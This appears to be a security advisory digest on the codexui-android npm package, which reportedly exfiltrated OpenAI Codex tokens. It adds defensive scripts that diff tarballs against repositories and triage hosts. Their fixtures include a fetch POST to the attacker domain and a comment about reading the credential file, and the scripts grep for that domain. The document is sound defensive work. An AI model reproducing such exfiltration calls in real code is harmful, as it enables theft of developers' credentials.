Aikido — OpenAI Codex Token Theft via codexui-android npm Package
AI relevance: This supply-chain attack targets AI developer tooling directly — stealing persistent Codex OAuth tokens that grant long-term access to an AI coding agent's full capabilities, and distributing the malicious package through AI-themed Android apps on Google Play.
What happened
- Aikido Security researcher Charlie Eriksen discovered the codexui-android npm package (29,000+ weekly downloads) silently exfiltrating OpenAI Codex authentication tokens to sentry.anyclaw.store.
- The package is a legitimate-looking remote web UI for Codex; the malicious code was added roughly a month after initial publication, building trust before flipping.
- It reads ~/.codex/auth.json (the plaintext credential cache) and sends the access_token, refresh_token, id_token, and account ID to the attacker's server.
- The refresh_token has no expiry, so stolen tokens allow indefinite impersonation of the victim's Codex account; because the attacker can keep minting fresh access tokens from it, the short lifetime of the access_token offers no protection on its own.
- The GitHub repo appears clean; the backdoor exists only in the published npm tarball, a known supply-chain evasion technique.
- The same exfiltration chain ships inside at least two Google Play apps under "BrutalStrike" (50,000+ and 10,000+ downloads), using PRoot to run the npm package in a sandboxed Linux environment.
- The package author (account "friuns", aka Igor Levochkin) initially claimed to have lost npm access, then pivoted to "investigating internally."
- The WHOIS record for anyclaw.store traces back to the same individual's X profile.
Why it matters
- Codex tokens provide persistent access to AI coding agents that can read, write, and execute code on behalf of the victim — a stolen token is equivalent to handing an attacker a full developer identity.
- This demonstrates that AI developer tools are becoming primary targets for supply-chain attacks, not just collateral.
- Google Play distribution through AI-themed apps creates a dual-vector attack: developers get infected from both npm and mobile app stores simultaneously.
- The "clean GitHub, malicious npm" pattern shows that source-audit alone won't catch this class of attack.
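Catching the "clean GitHub, malicious npm" pattern described above means comparing what the registry serves with what the repository contains. The following shell script is an added example, not Aikido's tooling or anything from the codexui-android project: it unpacks an npm tarball (what npm pack or a registry download gives you) and reports files that exist only in the tarball or whose content differs from the checkout. The fixture built by make_drift_fixture is constructed for an offline run; its package name (example-pkg) and the extra file (lib/report.js) are hypothetical.

```shell
#!/bin/sh
# Added example: diff the contents of a published npm tarball against a git
# checkout. Package names, file names and the fixture below are constructed
# for demonstration and are not taken from the real codexui-android package.

# compare_tarball_to_repo <package.tgz> <repo-dir>
# Prints one line per drifted file and returns 1 if any drift was found.
# Files present only in the repo (tests, CI config) are expected and ignored;
# the dangerous direction is code that exists only in the published artifact.
compare_tarball_to_repo() {
  tgz="$1"; repo="$2"
  work=$(mktemp -d)
  tar -xzf "$tgz" -C "$work"              # npm tarballs unpack under package/
  report="$work/report"
  : > "$report"
  find "$work/package" -type f | while IFS= read -r f; do
    rel=${f#"$work/package/"}
    if [ ! -f "$repo/$rel" ]; then
      echo "TARBALL-ONLY $rel" >> "$report"
    elif ! cmp -s "$f" "$repo/$rel"; then
      echo "CONTENT-DIFFERS $rel" >> "$report"
    fi
  done
  cat "$report"
  n=$(wc -l < "$report" | tr -d ' ')
  rm -rf "$work"
  [ "$n" -eq 0 ]
}

# make_drift_fixture: build a constructed repo plus a "published" tarball that
# carries one extra file the repo never had. Prints the fixture directory.
make_drift_fixture() {
  base=$(mktemp -d)
  mkdir -p "$base/repo/lib" "$base/pub/package/lib"
  printf '{ "name": "example-pkg", "version": "1.0.0", "main": "lib/index.js" }\n' \
    > "$base/repo/package.json"
  printf 'module.exports = function () { return "ui"; };\n' > "$base/repo/lib/index.js"
  printf 'exports.run = () => {};\n' > "$base/repo/test.js"   # repo-only, ignored
  cp "$base/repo/package.json" "$base/pub/package/package.json"
  cp "$base/repo/lib/index.js" "$base/pub/package/lib/index.js"
  # Hypothetical extra file that only the registry copy contains.
  printf 'const fs = require("fs"); // would read ~/.codex/auth.json here\n' \
    > "$base/pub/package/lib/report.js"
  (cd "$base/pub" && tar -czf "$base/example-pkg-1.0.0.tgz" package)
  echo "$base"
}

# Stand-alone run against the constructed fixture.
fixture=$(make_drift_fixture)
compare_tarball_to_repo "$fixture/example-pkg-1.0.0.tgz" "$fixture/repo" \
  || echo "drift detected: review the files above before installing"
```

For a real package, npm pack <name>@<version> fetches the registry tarball into the current directory without installing it, and the repo side is a git checkout at the tag that claims to match that version. A TARBALL-ONLY or CONTENT-DIFFERS line for anything under lib/ or in the entry point is exactly the signal the GitHub-only audit misses.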
What to do
- If you have codexui-android installed: uninstall it immediately, rotate all Codex tokens, and treat every credential in ~/.codex/auth.json (access_token, refresh_token, id_token, account ID) as exposed.
- Check for the Android apps "OpenClaw Codex Claude AI Agent" (gptos.intelligence.assistant) and "Codex" (codex.app) and uninstall them if present.
- Prefer API-key-based auth over file-based token storage where possible; treat ~/.codex/auth.json as a password file (owner-only permissions, kept out of shared volumes and container images).
- Audit installed npm packages for unexpected preinstall/postinstall scripts.
- Monitor for network connections to sentry.anyclaw.store in your environments (DNS and egress proxy logs are the cheapest place to look).
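The checks above, as an added host-triage script that is not Aikido's tooling or anything from the codexui-android project. It locates installed copies of the package, lists packages that declare install hooks, greps installed JavaScript and JSON for the exfiltration domain, and checks whether the Codex credential cache is readable beyond its owner, without printing the tokens themselves. Only the package name and the domain come from the advisory; the node_modules tree and the ~/.codex/auth.json layout built by make_triage_fixture are constructed for an offline run, and the example-tool package with its postinstall hook is an assumption, not a detail from the page.

```shell
#!/bin/sh
# Added example: host triage for the codexui-android / sentry.anyclaw.store case.
# Only the package name and IOC domain come from the advisory; the fixture,
# the file layout and the auth.json contents are constructed for this demo.

PKG="codexui-android"
IOC_DOMAIN="sentry.anyclaw.store"

# 1. Installed copies of the package under a root (a project tree, $HOME,
#    or a global prefix such as /usr/local/lib).
find_package() {
  find "$1" -type d -path "*/node_modules/$PKG" 2>/dev/null
}

# 2. package.json files under node_modules that declare an install hook.
#    A hook is one place a backdoor can run; its absence proves nothing.
list_install_scripts() {
  find "$1" -path "*/node_modules/*/package.json" -type f 2>/dev/null |
  while IFS= read -r pj; do
    if grep -Eq '"(pre|post)?install"[[:space:]]*:' "$pj"; then
      echo "$pj"
    fi
  done
}

# 3. Installed JavaScript/JSON that names the exfiltration host.
find_ioc_refs() {
  find "$1" -type f \( -name '*.js' -o -name '*.mjs' -o -name '*.cjs' -o -name '*.json' \) \
    -exec grep -lF "$IOC_DOMAIN" {} + 2>/dev/null
}

# 4. Credential cache: mode plus which token fields are present (values are
#    never printed). Anything beyond owner-only access is reported as exposed.
check_auth_file() {
  f="${1:-$HOME/.codex/auth.json}"
  if [ ! -f "$f" ]; then
    echo "absent $f"
    return 0
  fi
  mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")
  case "$mode" in
    *00) echo "mode=$mode ok" ;;
    *)   echo "mode=$mode exposed" ;;
  esac
  for k in access_token refresh_token id_token; do
    grep -q "\"$k\"" "$f" && echo "present $k"
  done
  return 0
}

# Constructed fixture: one copy of the package referencing the IOC domain,
# an unrelated package with a postinstall hook, and a group-readable auth.json.
# The auth.json field layout is assumed, not taken from the real file format.
make_triage_fixture() {
  base=$(mktemp -d)
  mkdir -p "$base/node_modules/$PKG/lib" "$base/node_modules/example-tool" "$base/.codex"
  printf '{ "name": "%s", "version": "1.0.0", "main": "lib/index.js" }\n' "$PKG" \
    > "$base/node_modules/$PKG/package.json"
  printf 'fetch("https://%s/collect", { method: "POST" });\n' "$IOC_DOMAIN" \
    > "$base/node_modules/$PKG/lib/upload.js"
  printf '{ "name": "example-tool", "scripts": { "postinstall": "node setup.js" } }\n' \
    > "$base/node_modules/example-tool/package.json"
  printf '{ "access_token": "REDACTED", "refresh_token": "REDACTED", "id_token": "REDACTED" }\n' \
    > "$base/.codex/auth.json"
  chmod 644 "$base/.codex/auth.json"
  echo "$base"
}

# Stand-alone run against the fixture; set ROOT to a real tree to triage it.
ROOT=${ROOT:-$(make_triage_fixture)}
echo "== installed copies";   find_package "$ROOT"
echo "== install hooks";      list_install_scripts "$ROOT"
echo "== IOC references";     find_ioc_refs "$ROOT"
echo "== credential cache";   check_auth_file "$ROOT/.codex/auth.json"
```

Run it with ROOT set to each project tree and to the global npm prefix; a hit from find_package or find_ioc_refs means the rotate-and-reauthenticate step above is mandatory, not optional, and a "mode=... exposed" line means the cache was readable by more than the owner regardless of whether this package was present.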